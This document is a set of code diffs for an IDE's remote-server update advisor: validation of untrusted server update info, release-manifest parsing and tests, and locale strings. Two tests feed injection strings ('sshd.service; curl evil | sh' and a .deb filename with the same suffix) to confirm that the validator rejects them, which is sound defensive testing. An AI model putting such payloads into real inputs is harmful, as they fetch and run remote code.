+import type { RuntimeStatus, RuntimeUpdateInfo } from '../../../../shared/runtime-types'
+
+const CLIENT_TOO_OLD: RuntimeCompatVerdict = {
+  kind: 'blocked',
+  reason: 'client-too-old',
+  clientProtocolVersion: 1,
+  serverProtocolVersion: 5,
+  requiredClientProtocolVersion: 4
+}
+
+const SERVER_TOO_OLD: RuntimeCompatVerdict = {
+  kind: 'blocked',
+  reason: 'server-too-old',
+  clientProtocolVersion: 5,
+  serverProtocolVersion: 1,
+  requiredServerProtocolVersion: 4
+}
+
+const OK: RuntimeCompatVerdict = {
+  kind: 'ok',
+  clientProtocolVersion: 5,
+  serverProtocolVersion: 5
+}
+
+function status(updateInfo?: RuntimeUpdateInfo): RuntimeStatus {
+  return {
+    runtimeId: 'remote-runtime',
+    rendererGraphEpoch: 0,
+    graphStatus: 'ready',
+    authoritativeWindowId: null,
+    liveTabCount: 0,
+    liveLeafCount: 0,
+    hostPlatform: 'linux',
+    updateInfo
+  }
+}
+
+describe('buildRuntimeUpdateAdvisorGuide verdict branching', () => {
+  it('returns null when the verdict is ok', () => {
+    expect(buildRuntimeUpdateAdvisorGuide({ verdict: OK, status: status() })).toBeNull()
+  })
+
+  it('routes client-too-old to the local updater with no server command blocks', () => {
+    // Even when the server advertises a command-producing install shape, the
+    // client-too-old path must never surface server commands.
+    const guide = buildRuntimeUpdateAdvisorGuide({
+      verdict: CLIENT_TOO_OLD,
+      status: status({ installKind: 'linux-appimage', restartKind: 'systemd' })
+    })
+    expect(guide?.direction).toBe('client-too-old')
+    if (guide?.direction !== 'client-too-old') {
+      throw new Error('expected client-too-old guide')
+    }
+    expect(guide.localUpdate).toBe(true)
+    expect(guide.message).toBe(describeRuntimeCompatBlock(CLIENT_TOO_OLD))
+    // The client-too-old shape has no steps field at all — no command blocks.
+    expect('steps' in guide).toBe(false)
+  })
+
+  it('produces copyable command steps for a server-too-old AppImage host', () => {
+    const guide = buildRuntimeUpdateAdvisorGuide({
+      verdict: SERVER_TOO_OLD,
+      status: status({ installKind: 'linux-appimage', restartKind: 'systemd' }),
+      portHint: 6900
+    })
+    if (guide?.direction !== 'server-too-old') {
+      throw new Error('expected server-too-old guide')
+    }
+    expect(guide.steps.some((step) => step.kind === 'command')).toBe(true)
+    expect(guide.protocol).toEqual({ running: 1, required: 4 })
+  })
+})
+
+describe('deriveRuntimeUpdateGuideInput trust boundary', () => {
+  it('passes untrusted updateInfo through validation before building the guide', () => {
+    const derived = deriveRuntimeUpdateGuideInput({
+      verdict: SERVER_TOO_OLD,
+      status: status({
+        installKind: 'linux-appimage',
+        restartKind: 'systemd',
+        // Injection attempt: must be discarded and replaced with the default.
+        serviceName: 'sshd.service; curl evil | sh',
+        // Unrecognized enum → 'unknown' is never surfaced here because
+        // installKind above is valid, but a bad hostArch must be dropped.
+        hostArch: 'sparc'
+      }),
+      portHint: 6900
+    })
+    expect(derived.installKind).toBe('linux-appimage')
+    expect(derived.restartKind).toBe('systemd')
+    expect(derived.serviceName).toBe(DEFAULT_SERVICE_NAME)
+    expect(derived.hostArch).toBeUndefined()
+    expect(derived.port).toBe(6900)
+    // assetUrl is owned by a later unit and must stay unset here.
+    expect(derived.assetUrl).toBeUndefined()
+  })
+
+  it('maps unrecognized install/restart kinds to unknown', () => {
+    const derived = deriveRuntimeUpdateGuideInput({
+      verdict: SERVER_TOO_OLD,
+      status: status({
+        installKind: 'made-up-kind' as RuntimeUpdateInfo['installKind'],
+        restartKind: 'made-up' as RuntimeUpdateInfo['restartKind']
+      })
+    })
+    expect(derived.installKind).toBe('unknown')
+    expect(derived.restartKind).toBe('unknown')
+  })
+})
+
+describe('parseEndpointPortHint', () => {
+  it('extracts an explicit port from the paired endpoint', () => {
+    expect(parseEndpointPortHint('wss://example.com:6768/pair')).toBe(6768)
+  })
+
+  it('returns undefined without an explicit port or for unparseable input', () => {
+    expect(parseEndpointPortHint('wss://example.com/pair')).toBeUndefined()
+    expect(parseEndpointPortHint('not a url')).toBeUndefined()
+    expect(parseEndpointPortHint(undefined)).toBeUndefined()
+    expect(parseEndpointPortHint(null)).toBeUndefined()
+    expect(parseEndpointPortHint('')).toBeUndefined()
+  })
+})

--- a/src/renderer/src/components/settings/runtime-update-advisor-model.test.ts
+++ b/src/renderer/src/components/settings/runtime-update-advisor-model.test.ts
@@ -106,6 +106,40 @@ describe('deriveRuntimeUpdateGuideInput trust boundary', () => {
     expect(derived.assetUrl).toBeUndefined()
   })
 
+  it('lets client-fetched manifest metadata win over server-supplied hints', () => {
+    const derived = deriveRuntimeUpdateGuideInput({
+      verdict: SERVER_TOO_OLD,
+      status: status({
+        installKind: 'linux-deb',
+        currentVersion: '1.0.0',
+        // Startup-stale server hints — the manifest must override them.
+        latestVersion: '1.1.0',
+        updateAvailable: false
+      }),
+      releaseMetadata: {
+        latestVersion: '1.4.0',
+        updateAvailable: true,
+        assetUrl:
+          'https://github.com/stablyai/orca/releases/latest/download/orca-ide_1.4.0_amd64.deb'
+      }
+    })
+    expect(derived.latestVersion).toBe('1.4.0')
+    expect(derived.updateAvailable).toBe(true)
+    expect(derived.assetUrl).toBe(
+      'https://github.com/stablyai/orca/releases/latest/download/orca-ide_1.4.0_amd64.deb'
+    )
+  })
+
+  it('falls back to server-supplied version hints while the manifest is absent', () => {
+    const derived = deriveRuntimeUpdateGuideInput({
+      verdict: SERVER_TOO_OLD,
+      status: status({ latestVersion: '1.1.0', updateAvailable: true })
+    })
+    expect(derived.latestVersion).toBe('1.1.0')
+    expect(derived.updateAvailable).toBe(true)
+    expect(derived.assetUrl).toBeUndefined()
+  })
+
   it('maps unrecognized install/restart kinds to unknown', () => {
     const derived = deriveRuntimeUpdateGuideInput({
       verdict: SERVER_TOO_OLD,

--- a/src/renderer/src/components/settings/runtime-update-advisor-model.ts
+++ b/src/renderer/src/components/settings/runtime-update-advisor-model.ts
@@ -5,6 +5,7 @@
 // `status.updateInfo` through the shared validator — lives in one place.
 
 import type { RuntimeCompatVerdict } from '../../../../shared/protocol-compat'
+import type { ReleaseMetadata } from '../../../../shared/runtime-release-manifest'
 import type { RuntimeStatus } from '../../../../shared/runtime-types'
 import {
   buildRuntimeUpdateGuide,
@@ -19,18 +20,24 @@ export type RuntimeUpdateAdvisorModelInput = {
   /** Port from the client's own paired endpoint — a hint the guide falls back
    *  from when absent. Never sourced from server metadata. */
   portHint?: number
+  /** Client-fetched release-manifest metadata. Wins over server-supplied
+   *  latestVersion/updateAvailable (which are startup-stale hints), and is the
+   *  only source of the exact deb/rpm asset URL. Absent while pending/failed. */
+  releaseMetadata?: ReleaseMetadata
 }
 
 /**
  * Derive the guide-matrix input from the verdict + status. `status.updateInfo`
  * is untrusted server data, so it always passes through `validateRuntimeUpdateInfo`
- * before any field selects a template or fills a placeholder. `assetUrl` is left
- * unset — a later unit supplies exact release asset URLs.
+ * before any field selects a template or fills a placeholder. `assetUrl` and the
+ * winning latestVersion/updateAvailable come from the client-fetched manifest via
+ * `input.releaseMetadata` when available.
  */
 export function deriveRuntimeUpdateGuideInput(
   input: RuntimeUpdateAdvisorModelInput
 ): RuntimeUpdateGuideInput {
   const validated = validateRuntimeUpdateInfo(input.status.updateInfo)
+  const release = input.releaseMetadata
   return {
     verdict: input.verdict,
     hostPlatform: input.status.hostPlatform,
@@ -40,8 +47,11 @@ export function deriveRuntimeUpdateGuideInput(
     serviceName: validated.serviceName,
     installPath: validated.installPath,
     currentVersion: validated.currentVersion,
-    latestVersion: validated.latestVersion,
-    updateAvailable: validated.updateAvailable,
+    // Client-fetched manifest wins; fall back to the server's startup-stale hint
+    // only when the manifest is pending or failed (`??` keeps a manifest `false`).
+    latestVersion: release?.latestVersion ?? validated.latestVersion,
+    updateAvailable: release?.updateAvailable ?? validated.updateAvailable,
+    assetUrl: release?.assetUrl,
     docsUrl: validated.docsUrl,
     port: input.portHint
   }

--- a/src/renderer/src/components/settings/runtime-update-advisor-model.ts
+++ b/src/renderer/src/components/settings/runtime-update-advisor-model.ts
@@ -1,0 +1,77 @@
+// Why: pure derivation of the advisor's view model from the compat verdict and
+// the blocked server's status. Kept out of the React component so the
+// verdict-branching logic (client-too-old renders no server commands) can be
+// unit-tested without rendering, and so the trust boundary — always running raw
+// `status.updateInfo` through the shared validator — lives in one place.
+
+import type { RuntimeCompatVerdict } from '../../../../shared/protocol-compat'
+import type { RuntimeStatus } from '../../../../shared/runtime-types'
+import {
+  buildRuntimeUpdateGuide,
+  type RuntimeUpdateGuide,
+  type RuntimeUpdateGuideInput
+} from '../../../../shared/runtime-update-guide'
+import { validateRuntimeUpdateInfo } from '../../../../shared/runtime-update-info-validation'
+
+export type RuntimeUpdateAdvisorModelInput = {
+  verdict: RuntimeCompatVerdict
+  status: RuntimeStatus
+  /** Port from the client's own paired endpoint — a hint the guide falls back
+   *  from when absent. Never sourced from server metadata. */
+  portHint?: number
+}
+
+/**
+ * Derive the guide-matrix input from the verdict + status. `status.updateInfo`
+ * is untrusted server data, so it always passes through `validateRuntimeUpdateInfo`
+ * before any field selects a template or fills a placeholder. `assetUrl` is left
+ * unset — a later unit supplies exact release asset URLs.
+ */
+export function deriveRuntimeUpdateGuideInput(
+  input: RuntimeUpdateAdvisorModelInput
+): RuntimeUpdateGuideInput {
+  const validated = validateRuntimeUpdateInfo(input.status.updateInfo)
+  return {
+    verdict: input.verdict,
+    hostPlatform: input.status.hostPlatform,
+    installKind: validated.installKind,
+    restartKind: validated.restartKind,
+    hostArch: validated.hostArch,
+    serviceName: validated.serviceName,
+    installPath: validated.installPath,
+    currentVersion: validated.currentVersion,
+    latestVersion: validated.latestVersion,
+    updateAvailable: validated.updateAvailable,
+    docsUrl: validated.docsUrl,
+    port: input.portHint
+  }
+}
+
+/** null when the verdict is not a block: the advisor renders nothing. */
+export function buildRuntimeUpdateAdvisorGuide(
+  input: RuntimeUpdateAdvisorModelInput
+): RuntimeUpdateGuide | null {
+  return buildRuntimeUpdateGuide(deriveRuntimeUpdateGuideInput(input))
+}
+
+/**
+ * Best-effort port hint parsed from the client-owned paired endpoint string
+ * (e.g. `wss://host:6768/...`). Returns undefined when the endpoint carries no
+ * explicit port or cannot be parsed, so the guide uses its documented default.
+ */
+export function parseEndpointPortHint(endpoint: string | undefined | null): number | undefined {
+  if (!endpoint) {
+    return undefined
+  }
+  let parsed: URL
+  try {
+    parsed = new URL(endpoint)
+  } catch {
+    return undefined
+  }
+  if (!parsed.port) {
+    return undefined
+  }
+  const port = Number(parsed.port)
+  return Number.isInteger(port) ? port : undefined
+}

--- a/src/renderer/src/components/settings/use-runtime-release-metadata.ts
+++ b/src/renderer/src/components/settings/use-runtime-release-metadata.ts
@@ -1,0 +1,90 @@
+// Why: lazily fetches the SERVER's electron-updater release manifest only while
+// the update advisor is shown for a `server-too-old` block — never on the compat
+// gate or the polled status path. The fetch is routed through main (renderer
+// fetch() would hit CORS on GitHub's release-asset redirect); parsing and
+// derivation reuse the shared, dependency-free release-manifest module. Any
+// failure yields undefined, so the advisor keeps its version-less guidance.
+
+import { useEffect, useMemo, useState } from 'react'
+import type { RuntimeCompatVerdict } from '../../../../shared/protocol-compat'
+import type { RuntimeStatus } from '../../../../shared/runtime-types'
+import {
+  deriveReleaseMetadata,
+  parseReleaseManifest,
+  type ParsedReleaseManifest,
+  type ReleaseMetadata
+} from '../../../../shared/runtime-release-manifest'
+import type { RuntimeUpdateGuideArch } from '../../../../shared/runtime-update-guide-templates'
+import { validateRuntimeUpdateInfo } from '../../../../shared/runtime-update-info-validation'
+
+// Staleness only affects advice text, never compatibility, so a short in-memory
+// cache keyed by platform/arch avoids re-fetching across advisor mounts.
+const CACHE_TTL_MS = 5 * 60 * 1000
+type CacheEntry = { at: number; manifest: ParsedReleaseManifest }
+const manifestCache = new Map<string, CacheEntry>()
+
+async function loadReleaseManifest(
+  platform: string | undefined,
+  arch: RuntimeUpdateGuideArch | undefined
+): Promise<ParsedReleaseManifest | null> {
+  const key = `${platform ?? ''}:${arch ?? ''}`
+  const cached = manifestCache.get(key)
+  if (cached && Date.now() - cached.at < CACHE_TTL_MS) {
+    return cached.manifest
+  }
+  const result = await window.api.runtimeReleaseManifest.fetch({ platform, arch })
+  if (!result.ok) {
+    return null
+  }
+  const manifest = parseReleaseManifest(result.yaml)
+  if (!manifest) {
+    return null
+  }
+  manifestCache.set(key, { at: Date.now(), manifest })
+  return manifest
+}
+
+/**
+ * Release metadata for the blocked server, or undefined while pending, on
+ * failure, or when the verdict is not `server-too-old`. Manifest values
+ * (latestVersion/updateAvailable/assetUrl) override any server-supplied hints
+ * downstream in the advisor model.
+ */
+export function useRuntimeReleaseMetadata(
+  verdict: RuntimeCompatVerdict,
+  status: RuntimeStatus
+): ReleaseMetadata | undefined {
+  const isServerTooOld = verdict.kind === 'blocked' && verdict.reason === 'server-too-old'
+  const validated = useMemo(() => validateRuntimeUpdateInfo(status.updateInfo), [status.updateInfo])
+  const platform = status.hostPlatform
+  const arch = validated.hostArch
+  const [manifest, setManifest] = useState<ParsedReleaseManifest | null>(null)
+
+  useEffect(() => {
+    if (!isServerTooOld) {
+      setManifest(null)
+      return
+    }
+    let cancelled = false
+    void loadReleaseManifest(platform, arch).then((loaded) => {
+      if (!cancelled) {
+        setManifest(loaded)
+      }
+    })
+    return () => {
+      cancelled = true
+    }
+  }, [isServerTooOld, platform, arch])
+
+  return useMemo(() => {
+    if (!manifest) {
+      return undefined
+    }
+    return deriveReleaseMetadata({
+      manifest,
+      currentVersion: validated.currentVersion,
+      installKind: validated.installKind,
+      arch
+    })
+  }, [manifest, validated.currentVersion, validated.installKind, arch])
+}

--- a/src/renderer/src/i18n/locales/en.json
+++ b/src/renderer/src/i18n/locales/en.json
@@ -9247,6 +9247,15 @@
         },
         "MobileRelayBetaNotice": {
           "notice": "Orca Relay is in beta."
+        },
+        "RuntimeUpdateAdvisor": {
+          "checkForUpdates": "Check for updates",
+          "downloadOrca": "Download the latest Orca",
+          "protocolLine": "Server protocol {{value0}}, this client requires {{value1}}.",
+          "serverVersion": "Server version {{value0}}.",
+          "latestVersion": "Latest version {{value0}}.",
+          "checkAgain": "Check again",
+          "stillOutOfDate": "Still out of date. Update the server, then check again."
         }
       },
       "right": {

--- a/src/renderer/src/i18n/locales/es.json
+++ b/src/renderer/src/i18n/locales/es.json
@@ -9224,6 +9224,15 @@
         },
         "MobileRelayBetaNotice": {
           "notice": "Orca Relay is in beta."
+        },
+        "RuntimeUpdateAdvisor": {
+          "checkForUpdates": "Check for updates",
+          "downloadOrca": "Download the latest Orca",
+          "protocolLine": "Server protocol {{value0}}, this client requires {{value1}}.",
+          "serverVersion": "Server version {{value0}}.",
+          "latestVersion": "Latest version {{value0}}.",
+          "checkAgain": "Check again",
+          "stillOutOfDate": "Still out of date. Update the server, then check again."
         }
       },
       "right": {

--- a/src/renderer/src/i18n/locales/ja.json
+++ b/src/renderer/src/i18n/locales/ja.json
@@ -9224,6 +9224,15 @@
         },
         "MobileRelayBetaNotice": {
           "notice": "Orca Relay is in beta."
+        },
+        "RuntimeUpdateAdvisor": {
+          "checkForUpdates": "Check for updates",
+          "downloadOrca": "Download the latest Orca",
+          "protocolLine": "Server protocol {{value0}}, this client requires {{value1}}.",
+          "serverVersion": "Server version {{value0}}.",
+          "latestVersion": "Latest version {{value0}}.",
+          "checkAgain": "Check again",
+          "stillOutOfDate": "Still out of date. Update the server, then check again."
         }
       },
       "right": {

--- a/src/renderer/src/i18n/locales/ko.json
+++ b/src/renderer/src/i18n/locales/ko.json
@@ -9224,6 +9224,15 @@
         },
         "MobileRelayBetaNotice": {
           "notice": "Orca Relay is in beta."
+        },
+        "RuntimeUpdateAdvisor": {
+          "checkForUpdates": "Check for updates",
+          "downloadOrca": "Download the latest Orca",
+          "protocolLine": "Server protocol {{value0}}, this client requires {{value1}}.",
+          "serverVersion": "Server version {{value0}}.",
+          "latestVersion": "Latest version {{value0}}.",
+          "checkAgain": "Check again",
+          "stillOutOfDate": "Still out of date. Update the server, then check again."
         }
       },
       "right": {

--- a/src/renderer/src/i18n/locales/zh.json
+++ b/src/renderer/src/i18n/locales/zh.json
@@ -9224,6 +9224,15 @@
         },
         "MobileRelayBetaNotice": {
           "notice": "Orca Relay is in beta."
+        },
+        "RuntimeUpdateAdvisor": {
+          "checkForUpdates": "Check for updates",
+          "downloadOrca": "Download the latest Orca",
+          "protocolLine": "Server protocol {{value0}}, this client requires {{value1}}.",
+          "serverVersion": "Server version {{value0}}.",
+          "latestVersion": "Latest version {{value0}}.",
+          "checkAgain": "Check again",
+          "stillOutOfDate": "Still out of date. Update the server, then check again."
         }
       },
       "right": {

--- a/src/renderer/src/runtime/runtime-protocol-compat.test.ts
+++ b/src/renderer/src/runtime/runtime-protocol-compat.test.ts
@@ -1,0 +1,86 @@
+import { describe, expect, it } from 'vitest'
+import {
+  assertRuntimeStatusCompatible,
+  getRuntimeCompatBlockDetails,
+  isRuntimeCompatBlockError,
+  RUNTIME_COMPAT_BLOCK_CODE
+} from './runtime-protocol-compat'
+import { describeRuntimeCompatBlock } from '../../../shared/protocol-compat'
+import {
+  MIN_COMPATIBLE_RUNTIME_SERVER_VERSION,
+  RUNTIME_PROTOCOL_VERSION
+} from '../../../shared/protocol-version'
+import type { RuntimeStatus } from '../../../shared/runtime-types'
+
+function blockedStatus(overrides: Partial<RuntimeStatus> = {}): RuntimeStatus {
+  return {
+    runtimeId: 'remote-runtime',
+    rendererGraphEpoch: 0,
+    graphStatus: 'ready',
+    authoritativeWindowId: null,
+    liveTabCount: 0,
+    liveLeafCount: 0,
+    // Old server: below the client's minimum → server-too-old block.
+    runtimeProtocolVersion: MIN_COMPATIBLE_RUNTIME_SERVER_VERSION - 1,
+    hostPlatform: 'linux',
+    ...overrides
+  }
+}
+
+describe('assertRuntimeStatusCompatible block error threading', () => {
+  it('does not throw for a compatible status', () => {
+    expect(() =>
+      assertRuntimeStatusCompatible(
+        blockedStatus({ runtimeProtocolVersion: RUNTIME_PROTOCOL_VERSION })
+      )
+    ).not.toThrow()
+  })
+
+  it('throws a coded Error whose message stays the descriptive block text', () => {
+    const status = blockedStatus()
+    let thrown: unknown
+    try {
+      assertRuntimeStatusCompatible(status)
+    } catch (error) {
+      thrown = error
+    }
+    expect(thrown).toBeInstanceOf(Error)
+    expect(isRuntimeCompatBlockError(thrown)).toBe(true)
+    expect((thrown as { code?: string }).code).toBe(RUNTIME_COMPAT_BLOCK_CODE)
+    // The runtime-environment switch flow reads only `.message`; keep it intact.
+    const details = getRuntimeCompatBlockDetails(thrown)
+    expect(details).not.toBeNull()
+    expect((thrown as Error).message).toBe(describeRuntimeCompatBlock(details!.verdict))
+  })
+
+  it('carries the verdict and the full status on the block error', () => {
+    const status = blockedStatus({ updateInfo: { installKind: 'linux-appimage' } })
+    let thrown: unknown
+    try {
+      assertRuntimeStatusCompatible(status)
+    } catch (error) {
+      thrown = error
+    }
+    const details = getRuntimeCompatBlockDetails(thrown)
+    expect(details).not.toBeNull()
+    expect(details!.verdict).toMatchObject({ kind: 'blocked', reason: 'server-too-old' })
+    // The exact status object is threaded so the advisor can read updateInfo/hostPlatform.
+    expect(details!.status).toBe(status)
+    expect(details!.status.updateInfo).toEqual({ installKind: 'linux-appimage' })
+  })
+})
+
+describe('getRuntimeCompatBlockDetails', () => {
+  it('returns null for non-block errors and non-errors', () => {
+    expect(getRuntimeCompatBlockDetails(null)).toBeNull()
+    expect(getRuntimeCompatBlockDetails(new Error('transport failed'))).toBeNull()
+    expect(getRuntimeCompatBlockDetails('runtime_compat_block')).toBeNull()
+  })
+
+  it('returns null for a legacy block error lacking verdict/status', () => {
+    const legacy = new Error('too old') as Error & { code?: string }
+    legacy.code = RUNTIME_COMPAT_BLOCK_CODE
+    expect(isRuntimeCompatBlockError(legacy)).toBe(true)
+    expect(getRuntimeCompatBlockDetails(legacy)).toBeNull()
+  })
+})

--- a/src/renderer/src/runtime/runtime-protocol-compat.ts
+++ b/src/renderer/src/runtime/runtime-protocol-compat.ts
@@ -1,4 +1,8 @@
-import { describeRuntimeCompatBlock, evaluateRuntimeCompat } from '../../../shared/protocol-compat'
+import {
+  describeRuntimeCompatBlock,
+  evaluateRuntimeCompat,
+  type RuntimeCompatVerdict
+} from '../../../shared/protocol-compat'
 import {
   MIN_COMPATIBLE_RUNTIME_SERVER_VERSION,
   RUNTIME_PROTOCOL_VERSION
@@ -10,10 +14,29 @@ import type { RuntimeStatus } from '../../../shared/runtime-types'
  *  the runtime-environment switch flow, reads only `.message` and is unaffected. */
 export const RUNTIME_COMPAT_BLOCK_CODE = 'runtime_compat_block'
 
+/** The compat verdict and the blocked server's status, carried on the thrown
+ *  block error so the advisor can render detection/versions without re-probing.
+ *  The gate stays a plain `Error` with `.code` + `.message`; these are extra
+ *  own-properties consumers read only through `getRuntimeCompatBlockDetails`. */
+export type RuntimeCompatBlockDetails = {
+  verdict: RuntimeCompatVerdict
+  status: RuntimeStatus
+}
+
 /** True when `error` is the protocol-compat block thrown by
  *  `assertRuntimeStatusCompatible` (vs a transient transport/timeout error). */
 export function isRuntimeCompatBlockError(error: unknown): boolean {
   return error instanceof Error && (error as { code?: string }).code === RUNTIME_COMPAT_BLOCK_CODE
+}
+
+/** Reads the verdict + status attached to a compat-block error. Returns null for
+ *  any other error, or a block error thrown before this contract existed. */
+export function getRuntimeCompatBlockDetails(error: unknown): RuntimeCompatBlockDetails | null {
+  if (!isRuntimeCompatBlockError(error)) {
+    return null
+  }
+  const { verdict, status } = error as { verdict?: RuntimeCompatVerdict; status?: RuntimeStatus }
+  return verdict && status ? { verdict, status } : null
 }
 
 export function assertRuntimeStatusCompatible(status: RuntimeStatus): void {
@@ -26,9 +49,13 @@ export function assertRuntimeStatusCompatible(status: RuntimeStatus): void {
   })
   if (verdict.kind === 'blocked') {
     // Preserve the descriptive message; add a `.code` marker so callers can
-    // distinguish a version block from a transport failure.
-    const error = new Error(describeRuntimeCompatBlock(verdict))
-    ;(error as { code?: string }).code = RUNTIME_COMPAT_BLOCK_CODE
+    // distinguish a version block from a transport failure, plus verdict/status
+    // so the advisor can render guidance while the environment stays blocked.
+    const error = new Error(describeRuntimeCompatBlock(verdict)) as Error &
+      Partial<RuntimeCompatBlockDetails> & { code?: string }
+    error.code = RUNTIME_COMPAT_BLOCK_CODE
+    error.verdict = verdict
+    error.status = status
     throw error
   }
 }

--- a/src/shared/runtime-release-manifest.test.ts
+++ b/src/shared/runtime-release-manifest.test.ts
@@ -1,0 +1,186 @@
+import { describe, expect, it } from 'vitest'
+import {
+  buildReleaseManifestUrl,
+  deriveReleaseMetadata,
+  manifestFilenameForHost,
+  parseReleaseManifest,
+  RELEASE_MANIFEST_BASE_URL,
+  selectPackageAssetUrl
+} from './runtime-release-manifest'
+
+// Shape emitted by electron-builder for a Linux AppImage release: note the
+// deb/rpm are NOT listed here, only the AppImage.
+const LINUX_MANIFEST = `version: 1.4.2
+files:
+  - url: orca-linux.AppImage
+    sha512: abc123==
+    size: 123456789
+path: orca-linux.AppImage
+sha512: abc123==
+releaseDate: '2026-07-01T00:00:00.000Z'
+`
+
+const MAC_MANIFEST = `version: 1.4.2
+files:
+  - url: orca-macos-arm64.zip
+    sha512: def456==
+    size: 987654321
+    blockMapSize: 4242
+path: orca-macos-arm64.zip
+sha512: def456==
+releaseDate: '2026-07-01T00:00:00.000Z'
+`
+
+describe('manifestFilenameForHost', () => {
+  it('maps each platform/arch to the electron-updater manifest filename', () => {
+    expect(manifestFilenameForHost('linux', 'x64')).toBe('latest-linux.yml')
+    expect(manifestFilenameForHost('linux', 'arm64')).toBe('latest-linux-arm64.yml')
+    // Arch unknown on Linux defaults to the x64 manifest, not a guess.
+    expect(manifestFilenameForHost('linux', undefined)).toBe('latest-linux.yml')
+    expect(manifestFilenameForHost('darwin', 'arm64')).toBe('latest-mac.yml')
+    expect(manifestFilenameForHost('darwin', undefined)).toBe('latest-mac.yml')
+    expect(manifestFilenameForHost('win32', 'x64')).toBe('latest.yml')
+  })
+
+  it('returns null for platforms with no published manifest', () => {
+    expect(manifestFilenameForHost(undefined, undefined)).toBeNull()
+    expect(manifestFilenameForHost('freebsd', 'x64')).toBeNull()
+  })
+})
+
+describe('buildReleaseManifestUrl', () => {
+  it('joins the client-owned base with the mapped filename', () => {
+    expect(buildReleaseManifestUrl('linux', 'arm64')).toBe(
+      `${RELEASE_MANIFEST_BASE_URL}/latest-linux-arm64.yml`
+    )
+  })
+
+  it('returns null when there is no manifest for the platform', () => {
+    expect(buildReleaseManifestUrl('aix', undefined)).toBeNull()
+  })
+})
+
+describe('parseReleaseManifest', () => {
+  it('extracts version and file urls from a linux manifest', () => {
+    expect(parseReleaseManifest(LINUX_MANIFEST)).toEqual({
+      version: '1.4.2',
+      files: ['orca-linux.AppImage']
+    })
+  })
+
+  it('extracts a quoted/prerelease version and mac zip asset', () => {
+    const manifest = parseReleaseManifest(MAC_MANIFEST)
+    expect(manifest?.version).toBe('1.4.2')
+    expect(manifest?.files).toEqual(['orca-macos-arm64.zip'])
+  })
+
+  it('accepts prerelease semver and strips quotes', () => {
+    expect(
+      parseReleaseManifest(`version: "2.0.0-rc.3"\nfiles:\n  - url: a.AppImage\n`)?.version
+    ).toBe('2.0.0-rc.3')
+  })
+
+  it('drops a malformed version but keeps the file list', () => {
+    const manifest = parseReleaseManifest(
+      `version: not-a-version\nfiles:\n  - url: orca-linux.AppImage\n`
+    )
+    expect(manifest?.version).toBeUndefined()
+    expect(manifest?.files).toEqual(['orca-linux.AppImage'])
+  })
+
+  it('returns null for empty or contentless input', () => {
+    expect(parseReleaseManifest('')).toBeNull()
+    expect(parseReleaseManifest('releaseDate: 2026-07-01\n')).toBeNull()
+    expect(parseReleaseManifest(123 as unknown as string)).toBeNull()
+  })
+})
+
+describe('selectPackageAssetUrl', () => {
+  it('returns undefined when the manifest lists only the AppImage (the real case)', () => {
+    const manifest = parseReleaseManifest(LINUX_MANIFEST)
+    expect(selectPackageAssetUrl(manifest?.files ?? [], 'linux-deb', 'x64')).toBeUndefined()
+    expect(selectPackageAssetUrl(manifest?.files ?? [], 'linux-rpm', 'x64')).toBeUndefined()
+  })
+
+  it('selects the arch-matching deb when the manifest enumerates one', () => {
+    const files = ['orca-ide_1.4.2_amd64.deb', 'orca-ide_1.4.2_arm64.deb', 'orca-linux.AppImage']
+    expect(selectPackageAssetUrl(files, 'linux-deb', 'arm64')).toBe(
+      `${RELEASE_MANIFEST_BASE_URL}/orca-ide_1.4.2_arm64.deb`
+    )
+    expect(selectPackageAssetUrl(files, 'linux-deb', 'x64')).toBe(
+      `${RELEASE_MANIFEST_BASE_URL}/orca-ide_1.4.2_amd64.deb`
+    )
+  })
+
+  it('selects the arch-matching rpm by its x86_64/aarch64 token', () => {
+    const files = ['orca-ide-1.4.2.x86_64.rpm', 'orca-ide-1.4.2.aarch64.rpm']
+    expect(selectPackageAssetUrl(files, 'linux-rpm', 'x64')).toBe(
+      `${RELEASE_MANIFEST_BASE_URL}/orca-ide-1.4.2.x86_64.rpm`
+    )
+    expect(selectPackageAssetUrl(files, 'linux-rpm', 'arm64')).toBe(
+      `${RELEASE_MANIFEST_BASE_URL}/orca-ide-1.4.2.aarch64.rpm`
+    )
+  })
+
+  it('does not offer a mismatched-arch package', () => {
+    expect(
+      selectPackageAssetUrl(['orca-ide_1.4.2_amd64.deb'], 'linux-deb', 'arm64')
+    ).toBeUndefined()
+  })
+
+  it('rejects a package filename carrying shell metacharacters', () => {
+    expect(
+      selectPackageAssetUrl(['orca-ide_1.4.2_amd64.deb; curl evil | sh'], 'linux-deb', 'x64')
+    ).toBeUndefined()
+  })
+
+  it('returns undefined for non-package install kinds', () => {
+    expect(
+      selectPackageAssetUrl(['orca-ide_1.4.2_amd64.deb'], 'linux-appimage', 'x64')
+    ).toBeUndefined()
+    expect(selectPackageAssetUrl(['orca-ide_1.4.2_amd64.deb'], undefined, 'x64')).toBeUndefined()
+  })
+})
+
+describe('deriveReleaseMetadata', () => {
+  it('reports updateAvailable when both versions are known and differ', () => {
+    const manifest = { version: '1.4.2', files: [] }
+    expect(deriveReleaseMetadata({ manifest, currentVersion: '1.0.0' })).toEqual({
+      latestVersion: '1.4.2',
+      updateAvailable: true
+    })
+  })
+
+  it('reports updateAvailable false when versions match', () => {
+    const manifest = { version: '1.4.2', files: [] }
+    expect(deriveReleaseMetadata({ manifest, currentVersion: '1.4.2' })).toEqual({
+      latestVersion: '1.4.2',
+      updateAvailable: false
+    })
+  })
+
+  it('omits updateAvailable when the server version is unknown (cold-start)', () => {
+    const manifest = { version: '1.4.2', files: [] }
+    const metadata = deriveReleaseMetadata({ manifest })
+    expect(metadata.latestVersion).toBe('1.4.2')
+    expect(metadata.updateAvailable).toBeUndefined()
+  })
+
+  it('adds an asset URL only when a matching package is enumerated', () => {
+    const withDeb = deriveReleaseMetadata({
+      manifest: { version: '1.4.2', files: ['orca-ide_1.4.2_amd64.deb'] },
+      currentVersion: '1.0.0',
+      installKind: 'linux-deb',
+      arch: 'x64'
+    })
+    expect(withDeb.assetUrl).toBe(`${RELEASE_MANIFEST_BASE_URL}/orca-ide_1.4.2_amd64.deb`)
+
+    const appImageOnly = deriveReleaseMetadata({
+      manifest: parseReleaseManifest(LINUX_MANIFEST) ?? { files: [] },
+      currentVersion: '1.0.0',
+      installKind: 'linux-deb',
+      arch: 'x64'
+    })
+    expect(appImageOnly.assetUrl).toBeUndefined()
+  })
+})

--- a/src/shared/runtime-release-manifest.ts
+++ b/src/shared/runtime-release-manifest.ts
@@ -1,0 +1,193 @@
+// Why: shared, dependency-free release-metadata lookup for the remote server
+// update advisor. Maps the SERVER's platform/arch to the electron-updater
+// manifest the desktop updater already publishes (`latest-*.yml`), parses the
